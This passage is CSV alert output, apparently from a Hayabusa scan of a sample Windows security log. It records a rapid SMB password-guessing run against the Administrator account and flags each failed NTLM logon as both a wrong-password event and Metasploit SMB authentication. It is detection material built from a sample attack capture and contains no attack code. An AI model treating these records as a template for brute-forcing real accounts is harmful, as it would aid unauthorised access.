SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0e3ATNpzeeAf6Qax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1A0dGhpVy8kgiRP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGgNAKJM5RAt9B5K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: c3DpedXujvQpZnjQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BsaSjESaUHbsIxJL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ca4dlxyEco3VOapw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6lJc7DXAOcNZ2G : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Olt5mS7na07VDJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCFeQcUMDTs0ev8v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYmH6CQrizoZ1DAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iYtujXkzySwZQFk8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KE9v6wzrebvjvDIl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81gmRFFBHI1s4dqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: C8gHWPDjQM8M3tiQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: szj4mJvtFV06CuR2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ceGEl87hOM0InAAd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XRv3C3rRxYXTgckj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TaPkJPIQnbL3VyUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZ7PZAT6hWWHNc29 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJVD4uVhwfLSJ6Ab : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6KME1I6tE0v9UAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Qtt1rk4n3tOJko2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: prPsA8EZHGfGPSHm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: TQqGXnwHtB87LSzT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6uLT1bjaIS0XBsWC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIgpraQTxFrcLphN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1D6qy57XImq4prx : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Kw44Ffh4DIPlyuM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oKUdmKU74RmJysAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZUTzZw0T1tYRSP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nEOfjuAMa7HTsfcP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e7bG19emMTmyBQNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YsLkgWukfqS3wWJK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: liFcZjjpY3xXwe9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBUgbfzx2OEcOxWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVCV0WoZmLTFNH71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJmxGOqck4oQi1kL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w7lYqaUvEtTp18DK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ9xQmGn61JJDeQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XuMXpvY9fmLm0eBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ofesuNErTLWuN0k4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsNq7SThd3b8oTwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmRWg5gNRcxDMFjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JXrGn6LehVwTGNNj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIq9DS71jCjWbgdY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kw2BQbdUml0EPNOs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugOqsKQFGmmLac3s : IP Address: 192.168.198.149 : AuthPackage: 
